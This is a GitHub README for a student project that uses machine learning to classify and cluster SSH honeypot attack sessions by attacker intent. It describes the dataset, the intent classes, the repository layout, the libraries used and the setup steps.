SSH Shell Attacks

Table of Contents

• Overview
• Dataset
• Project Report
• Project Structure
• Tools and Technologies
• How to Run the Project
• Detailed Documentation
     • Data Directory
     • Notebooks Directory
     • Results Directory
     • Scripts Directory
     • Tests Directory
• Authors
• License
• Acknowledgments

Last updated: January 2025

Overview

This project is part of the Machine Learning for Networking course at Politecnico di Torino. It focuses on analyzing SSH shell attack sessions recorded from honeypot deployments to classify attacker intents and explore underlying patterns.

Original Project Repository: ML4Net/SSH-Shell-Attacks
Original Report Repository: ML4Net/latex-report

Navigation Tip: This README provides a general overview of the project. For detailed documentation, check the specific README files in each directory (see Table of Contents above). Each subdirectory contains in-depth information about its specific components.

Quick Links:

For data structure and preprocessing: Data Documentation

For analysis notebooks: Notebooks Documentation

For implementation details: Scripts Documentation

Objectives

Classification: Automatically identify and assign attacker intents (e.g., Persistence, Discovery) to each SSH attack session.
Clustering: Group similar attack sessions to uncover attack patterns and fine-grained categories.
Language Models: Explore advanced NLP techniques like BERT and Doc2Vec for improved classification performance.

Dataset

The dataset consists of approximately 230,000 Unix shell attack sessions recorded from honeypots. It includes:

Session Commands: Malicious commands executed in an SSH session.
Timestamps: The exact time each attack started.
Labels: Pre-assigned intents based on the MITRE ATT&CK framework.

Intents (Classes)

The dataset uses 7 main intent classes:

Persistence
Discovery
Defense Evasion
Execution
Impact
Other (Miscellaneous intents)
Harmless (Non-malicious commands)

Project Report

The project report is a comprehensive document detailing the methodologies, experiments, and findings of the SSH Shell Attacks project.

Format: PDF
Template: ACM format single column (acmlarge)

The report is named SSH-Shell-Attacks-report.pdf and can be found in the root directory of the repository.

There is also an appendix of the project that contains extra plots and additional information. The appendix is also in the root directory, in PDF format, and uses the same ACM format single column template. The appendix is named SSH-Shell-Attacks-appendix.pdf.

The original source code of the report can be found in the repo latex-report.

Project Structure

SSH-Shell-Attacks/
│
├── data/                           # Dataset and related resources
│   ├── raw/                        # Original dataset files (e.g., ssh_attacks.parquet)
│   └── processed/                  # Pre-processed and feature-engineered files
│
├── notebooks/                      # Jupyter notebooks
│
├── scripts/                        # Python scripts for algorithms and utilities
│
├── results/                        # Outputs from the models and analysis
│   ├── figures/                    # Plots and visualizations
│   ├── models/                     # Saved models (e.g., .pkl, .h5)
│   └── metrics/                    # Evaluation metrics and reports
│
├── README.md                       # High-level overview of the project
├── SSH-Shell-Attacks-report.pdf    # Report of the project
├── SSH-Shell-Attacks-appendix.pdf  # Appendix of the report
├── requirements.txt                # Python dependencies
├── .gitignore                      # Ignore unnecessary files for versioning
└── LICENSE                         # Licensing information (optional)

Tools and Technologies

Programming Language: Python
Libraries:
- Data Processing: pandas, numpy, pyarrow
- Visualization: matplotlib, seaborn
- Machine Learning: scikit-learn
- Clustering: scikit-learn, wordcloud
- Language Models: scikit-learn, transformers, torch

How to Run the Project

Clone the Repository:

git clone https://github.com/ML4Net/SSH-Shell-Attacks.git
cd SSH-Shell-Attacks

Install Dependencies:
```
pip install -r requirements.txt
```
Execute the Notebooks: Open the relevant notebook for each section and follow the instructions to:
- Load the dataset.
- Perform data exploration.
- Train and evaluate machine learning models.
Notebooks:
- section0_data_preprocessing_and_cleaning.ipynb
- section1_data_exploration_and_preprocessing.ipynb
- section2_supervised_learning_classification.ipynb
- section3_unsupervised_learning_clustering.ipynb
- section4_language_model_exploration.ipynb
Explore Scripts: Run modular scripts in the scripts/ directory for specific tasks like preprocessing or model training.

Authors

Name	GitHub	LinkedIn	Email
Andrea Botticella
Elia Innocenti
Renato Mignone
Simone Romano

License

This project is licensed under the MIT License - see the LICENSE file for details.

Acknowledgments

Luca Vassio ([email protected]): the professor supervising our work and the primary point of reference for the project.
Matteo Boffa ([email protected]): the creator and organizer of this project.
Team Members: Andrea Botticella, Elia Innocenti, Renato Mignone, and Simone Romano.

Please cite us if this project is copied, used for inspiration, or if any material is taken from it.

Back to top

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

SSH Shell Attacks

Overview

Objectives

Dataset

Intents (Classes)

Project Report

Project Structure

Tools and Technologies

How to Run the Project

Authors

License

Acknowledgments

About

Releases

Packages

Contributors 4

Languages

Name		Name	Last commit message	Last commit date
Latest commit History 183 Commits
data		data
notebooks		notebooks
resources		resources
results		results
scripts		scripts
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
SSH-Shell-Attacks-appendix.pdf		SSH-Shell-Attacks-appendix.pdf
SSH-Shell-Attacks-report.pdf		SSH-Shell-Attacks-report.pdf
requirements.txt		requirements.txt

License

ML4Net/SSH-Shell-Attacks

Folders and files

Latest commit

History

Repository files navigation

SSH Shell Attacks

Overview

Objectives

Dataset

Intents (Classes)

Project Report

Project Structure

Tools and Technologies

How to Run the Project

Authors

License

Acknowledgments

About

Topics

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Contributors 4

Languages

Packages